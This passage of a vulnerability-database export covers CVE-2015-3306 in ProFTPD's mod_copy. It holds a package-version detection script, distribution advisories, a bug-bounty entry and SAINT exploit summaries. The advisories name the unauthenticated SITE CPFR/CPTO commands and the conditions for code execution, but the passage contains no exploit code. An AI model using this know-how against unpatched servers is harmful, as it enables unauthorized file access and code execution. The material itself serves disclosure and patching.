\"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-debugsource-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-devel-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-lang-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-ldap-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-ldap-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-mysql-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-mysql-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-pgsql-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-pgsql-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-radius-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-radius-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-sqlite-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-sqlite-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-debugsource-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-devel-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-lang-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-ldap-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-ldap-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-mysql-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-mysql-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-pgsql-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-pgsql-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-radius-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-radius-debuginfo-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-sqlite-1.3.5a-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"proftpd-sqlite-debuginfo-1.3.5a-3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd / proftpd-debuginfo / proftpd-debugsource / proftpd-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:49:34", "description": "The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and\nwrite to arbitrary files via the site cpfr and site cpto commands.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/proftpd-dfsg/+bug/1462311>\n * <http://bugs.proftpd.org/show_bug.cgi?id=4169>\n", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "ubuntucve", "title": "CVE-2015-3306", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-18T00:00:00", "id": "UB:CVE-2015-3306", "href": "https://ubuntu.com/security/CVE-2015-3306", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-21T22:57:23", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3263-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nMay 19, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : proftpd-dfsg\nCVE ID : CVE-2015-3306\nDebian Bug : 782781\n\nVadim Melihow discovered that in proftpd-dfsg, an FTP server, the\nmod_copy module allowed unauthenticated users to copy files around on\nthe server, and possibly to execute arbitrary code.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 1.3.5-2.\n\nWe recommend that you upgrade your proftpd-dfsg packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-19T21:46:37", "type": "debian", "title": "[SECURITY] [DSA 3263-1] proftpd-dfsg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-19T21:46:37", "id": "DEBIAN:DSA-3263-1:84E2C", "href": "https://lists.debian.org/debian-security-announce/2015/msg00154.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-29T01:03:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3263-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nMay 19, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : proftpd-dfsg\nCVE ID : CVE-2015-3306\nDebian Bug : 782781\n\nVadim Melihow discovered that in proftpd-dfsg, an FTP server, the\nmod_copy module allowed unauthenticated users to copy files around on\nthe server, and possibly to execute arbitrary code.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 1.3.5-2.\n\nWe recommend that you upgrade your proftpd-dfsg packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-19T21:46:37", "type": "debian", "title": "[SECURITY] [DSA 3263-1] proftpd-dfsg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-19T21:46:37", "id": "DEBIAN:DSA-3263-1:BB481", "href": "https://lists.debian.org/debian-security-announce/2015/msg00154.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "ProFTPD is an enhanced FTP server with a focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directo ry visibility. This package defaults to the standalone behavior of ProFTPD, but all the needed scripts to have it run by systemd instead are included. ", "cvss3": {}, "published": "2015-05-03T17:25:10", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: proftpd-1.3.5-6.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-03T17:25:10", "id": "FEDORA:1262C6078F40", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7YIMMJAH62SWXJPY6RVGTCS4WDFS52OU/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "ProFTPD is an enhanced FTP server with a focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directo ry visibility. This package defaults to the standalone behavior of ProFTPD, but all the needed scripts to have it run by xinetd instead are included. ", "cvss3": {}, "published": "2015-05-10T23:49:44", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: proftpd-1.3.5-5.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-10T23:49:44", "id": "FEDORA:5B59E60582A4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KXGXDOA6E22YCV4EMAIY36P4RBHXZPU5/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "ProFTPD is an enhanced FTP server with a focus toward simplicity, security, and ease of configuration. It features a very Apache-like configuration syntax, and a highly customizable server infrastructure, including support for multiple 'virtual' FTP servers, anonymous FTP, and permission-based directo ry visibility. This package defaults to the standalone behavior of ProFTPD, but all the needed scripts to have it run by xinetd instead are included. ", "cvss3": {}, "published": "2015-05-03T17:25:18", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: proftpd-1.3.4e-3.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4359", "CVE-2015-3306"], "modified": "2015-05-03T17:25:18", "id": "FEDORA:6676A6078F43", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZV2IGLWVVCG3M5QHI6ULPK7EL43P52N7/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2021-02-13T12:35:22", "bounty": 150.0, "description": "CVE-2015-3306 in opened to external network FTP server on files.ucs.ru", "edition": 2, "cvss3": {}, "published": "2020-11-02T11:13:12", "type": "hackerone", "title": "Mail.ru: [files.ucs.ru] ProFTPd mod_copy Arbitrary Read/Write", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2021-02-13T12:21:10", "id": "H1:1024393", "href": "https://hackerone.com/reports/1024393", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2021-07-28T14:46:53", "description": "New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz: Upgraded.\n Patched an issue where mod_copy allowed unauthenticated copying\n of files via SITE CPFR/CPTO.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/proftpd-1.3.4e-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/proftpd-1.3.4e-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/proftpd-1.3.4e-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/proftpd-1.3.4e-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/proftpd-1.3.5-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/proftpd-1.3.5-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n2a8e151c0a89cd4c762f91d0ebdb42ad proftpd-1.3.4e-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8527f88708637716574865e4236c9735 proftpd-1.3.4e-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n8b4fc4806eac629458d4b896576b81c3 proftpd-1.3.4e-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n91ba22a276abb6f5c71b9fb6c1189f16 proftpd-1.3.4e-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n1cafe01a6781e838e3f4b4e760ecd8a8 proftpd-1.3.4e-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n5f0c02a30013e417306415cf581e6f84 proftpd-1.3.4e-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nd7ce0c331867f3729b3f19109f0c3719 proftpd-1.3.4e-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n2e3d9b3bc4ee47673fd8d584641d8749 proftpd-1.3.4e-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n0988db123b29a86ef9701cabb963c92a proftpd-1.3.4e-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n0354803c7ef6d0e1f62ea248e99fc4e5 proftpd-1.3.4e-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81735dd24713102370b25cde0433b701 n/proftpd-1.3.5-i486-1.txz\n\nSlackware x86_64 -current package:\n75298849d3cfd9a1ddae18bbf298dd6f n/proftpd-1.3.5-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg proftpd-1.3.4e-i486-1_slack14.1.txz", "cvss3": {}, "published": "2015-04-22T01:24:15", "type": "slackware", "title": "[slackware-security] proftpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-22T01:24:15", "id": "SSA-2015-111-12", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.503863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nProFTPd development team reports:\n\nVadim Melihow reported a critical issue with proftpd\n\t installations that use the mod_copy module's SITE CPFR/SITE\n\t CPTO commands; mod_copy allows these commands to be used by\n\t *unauthenticated clients*.\n\n\n", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "freebsd", "title": "proftpd -- arbitrary code execution vulnerability with chroot", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-04-15T00:00:00", "id": "D0034536-FF24-11E4-A072-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/d0034536-ff24-11e4-a072-d050996490d0.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-06-11T06:01:43", "description": "The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.", "cvss3": {}, "published": "2015-05-18T15:59:00", "type": "debiancve", "title": "CVE-2015-3306", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-18T15:59:00", "id": "DEBIANCVE:CVE-2015-3306", "href": "https://security-tracker.debian.org/tracker/CVE-2015-3306", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T06:01:43", "description": "An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-19T23:15:00", "type": "debiancve", "title": "CVE-2019-12815", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306", "CVE-2019-12815"], "modified": "2019-07-19T23:15:00", "id": "DEBIANCVE:CVE-2019-12815", "href": "https://security-tracker.debian.org/tracker/CVE-2019-12815", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T16:00:29", "description": "A remote file copying vulnerability exists in ProFTPD. The vulnerability is due to a design weakness within module mod_copy. Successful exploitation would result in arbitrary code execution on target system.", "cvss3": {}, "published": "2015-04-29T00:00:00", "type": "checkpoint_advisories", "title": "ProFTPD mod_copy Unauthenticated Remote File Copying (CVE-2015-3306)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-08-20T00:00:00", "id": "CPAI-2015-0510", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "description": "Added: 05/29/2015 \nCVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms. \n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "saint", "title": "ProFTPD mod_copy command execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-29T00:00:00", "id": "SAINT:63FB77B9136D48259E4F0D4CDA35E957", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-29T16:40:09", "description": "Added: 05/29/2015 \nCVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms. \n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "saint", "title": "ProFTPD mod_copy command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-29T00:00:00", "id": "SAINT:950EB68D408A40399926A4CCAD3CC62E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:43", "description": "Added: 05/29/2015 \nCVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms. \n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the 